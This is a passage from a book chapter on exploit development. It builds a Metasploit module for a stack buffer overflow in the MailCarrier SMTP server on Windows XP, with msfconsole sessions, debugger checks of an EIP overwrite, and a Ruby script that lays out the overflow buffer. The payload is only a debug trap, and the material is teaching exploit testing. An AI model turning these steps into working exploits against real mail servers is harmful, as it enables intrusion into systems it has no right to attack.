Chapter 15
In this case, we've placed an interrupt (a breakpoint) in the exploit section so that execution will pause as soon as it reaches our shellcode, without us having to set a breakpoint in the debugger by hand.
Having configured the exploit section, we save the file as mailcarrier_book.rb under modules/exploits/windows/smtp/.
Testing Our Base Exploit
In the next step, we load the module in msfconsole, set the required options, and configure a payload of generic/debug_trap (a great payload for exploit development: it consists of a single interrupt instruction, so it triggers a stop point when you are tracing the application in a debugger). Then we run the module:
msf > use exploit/windows/smtp/mailcarrier_book
msf exploit(mailcarrier_book) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The local address
   RHOST                   yes       The target address
   RPORT  25               yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP2 - EN

msf exploit(mailcarrier_book) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(mailcarrier_book) > set RHOST 192.168.1.155
RHOST => 192.168.1.155
msf exploit(mailcarrier_book) > set payload generic/debug_trap
payload => generic/debug_trap
msf exploit(mailcarrier_book) > exploit
[*] Exploit completed, but no session was created.
msf exploit(mailcarrier_book) >
We set the options as if we were running a normal exploit, except that we use the generic/debug_trap payload to test our exploit. The "no session was created" message is expected here: the debug trap never connects back, it only stops the process in the debugger.
After the module runs, the debugger should pause with EIP overwritten by 42424242, as shown in Figure 15-1; if you see a successful EIP overwrite of 42424242, you know your exploit is working. Notice in Figure 15-1 that the EIP register points to 42424242 and that the NOP slide and the dummy payload have made it into the buffer as expected.
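The checks described above can be scripted rather than read off the debugger screen each time the module is rebuilt. The following stand-alone Ruby is an added example, not code from the book or from the Metasploit module: it builds a buffer with the same layout the test relies on (junk up to the saved return address, "BBBB" for EIP, a NOP slide, then the int3 byte that generic/debug_trap delivers) and verifies that the EIP slot, the slide and the trap land where the debugger should show them. The offset and slide length are assumptions for illustration; the real module's values come from the offset-finding work earlier in the chapter.

```ruby
# Added example (not from the book or the Metasploit module).
# Mirrors the test buffer layout: junk | "BBBB" -> EIP | NOP slide | int3.

JUNK_OFFSET = 2000                   # assumed distance to the saved return address
EIP_MARKER  = "B" * 4                # shows up in EIP as 42424242
NOP_SLED    = ("\x90" * 16).b        # assumed slide length
DEBUG_TRAP  = "\xcc".b               # int3: the byte generic/debug_trap sends

# Build the buffer the way the exploit section assembles it.
def build_test_buffer(offset: JUNK_OFFSET, payload: DEBUG_TRAP)
  (("A" * offset) + EIP_MARKER + NOP_SLED + payload).b
end

# Read the dword that overwrites the saved return address, little-endian,
# formatted the way the debugger's register pane prints EIP.
def eip_from_buffer(buf, offset = JUNK_OFFSET)
  buf[offset, 4].unpack("V")[0].to_s(16).rjust(8, "0")
end

# Check a constructed register-pane line such as "EIP 42424242" against the
# marker we expect; any other value means the offset is wrong.
def eip_overwritten?(register_line, expected = "42424242")
  m = register_line.match(/\bEIP\s+([0-9A-Fa-f]{8})\b/)
  !m.nil? && m[1].downcase == expected
end

# Confirm that the NOP slide immediately follows the return-address slot and
# that the first byte after the slide is the int3 the debugger will stop on.
def layout_after_eip(buf, offset = JUNK_OFFSET)
  after = buf[offset + 4, buf.bytesize]
  {
    sled_ok: after.start_with?(NOP_SLED),
    trap_ok: after.getbyte(NOP_SLED.bytesize) == 0xcc
  }
end

if __FILE__ == $PROGRAM_NAME
  buf = build_test_buffer
  puts "EIP slot holds #{eip_from_buffer(buf)}"
  puts "register line matches: #{eip_overwritten?('EIP 42424242')}"   # constructed line
  puts "layout after EIP: #{layout_after_eip(buf)}"
end
```

Swap the assumed offset for the one you measured and point the check at the register line copied from the debugger; if eip_from_buffer and the debugger disagree, the offset is off, and if trap_ok is false the payload is not where the slide leads.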